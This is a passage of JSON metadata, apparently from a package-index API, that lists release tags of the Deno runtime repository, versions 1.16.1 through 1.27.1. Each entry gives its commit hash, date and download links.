syste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositori